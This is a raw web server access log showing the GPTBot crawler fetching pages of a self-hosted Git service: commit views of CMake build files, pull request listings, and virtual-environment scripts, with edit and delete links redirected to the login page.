"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:18:21:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=source" [Client 74.7.227.38] [Length 15267] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:21:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11100] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:21:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" -[17/Feb/2026:18:21:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.CoreCompileInputs.cache" -[17/Feb/2026:18:21:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=.Notebook%2fubuntu%20%ec%84%9c%eb%b2%84%20%ea%b8%b0%eb%b3%b8%eb%aa%85%eb%a0%b9%ec%96%b4.md" [Client 74.7.227.38] [Length 21213] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" -[17/Feb/2026:18:21:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:18:21:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:21:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/dummy.cpp?display=rendered" [Client 74.7.227.38] [Length 11049] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:18:21:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/dummy.cpp?display=rendered" [Client 74.7.227.38] [Length 11049] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:18:21:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/dummy.cpp?display=source" [Client 74.7.227.38] [Length 11188] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:18:21:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.ninja_deps?display=rendered" [Client 74.7.227.38] [Length 10934] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.ninja_deps" -[17/Feb/2026:18:21:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.ninja_log?display=source" [Client 74.7.227.38] [Length 11410] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.ninja_log" -[17/Feb/2026:18:21:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/dummy.cpp?display=source" [Client 74.7.227.38] [Length 11220] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:18:21:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/dummy.cpp?display=source" [Client 74.7.227.38] [Length 11218] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:18:21:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.ninja_log?display=rendered" [Client 74.7.227.38] [Length 10985] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.ninja_log" -[17/Feb/2026:18:21:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/dummy.cpp?display=source" [Client 74.7.227.38] [Length 11218] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:18:21:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/dummy.cpp?display=rendered" [Client 74.7.227.38] [Length 11050] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:18:21:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:21:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:21:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:21:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:21:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/dummy.cpp?display=rendered" [Client 74.7.227.38] [Length 11020] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/dummy.cpp" -[17/Feb/2026:18:22:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9927] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=mostcomment&state=all&type=all" -[17/Feb/2026:18:22:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11093] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:18:22:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=source" [Client 74.7.227.38] [Length 13731] [Gzip 4.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:18:22:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:18:22:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:22:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake?display=source" [Client 74.7.227.38] [Length 13728] [Gzip 4.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:18:22:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 20106] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" -[17/Feb/2026:18:22:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 10680] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip3" -[17/Feb/2026:18:22:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11020] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:22:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13365] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:18:22:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13364] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:18:22:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11060] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:22:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11060] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:22:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13365] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:18:22:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&state=open&type=all" [Client 74.7.227.38] [Length 9970] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls" -[17/Feb/2026:18:22:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&state=open&type=all" [Client 74.7.227.38] [Length 9967] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls" -[17/Feb/2026:18:22:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:18:22:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/Activate.ps1" -[17/Feb/2026:18:22:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/Activate.ps1" -[17/Feb/2026:18:22:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/pip3" -[17/Feb/2026:18:22:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/pip3" -[17/Feb/2026:18:22:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/pip3" -[17/Feb/2026:18:22:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/pip3" -[17/Feb/2026:18:22:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/Activate.ps1" -[17/Feb/2026:18:22:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/Activate.ps1" -[17/Feb/2026:18:22:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 22679] [Gzip 11.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/Activate.ps1" -[17/Feb/2026:18:22:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 9840] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/Activate.ps1" -[17/Feb/2026:18:22:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 9033] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/Activate.ps1" -[17/Feb/2026:18:22:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 967] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/Activate.ps1" -[17/Feb/2026:18:22:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 9979] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&state=all&type=all" -[17/Feb/2026:18:22:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 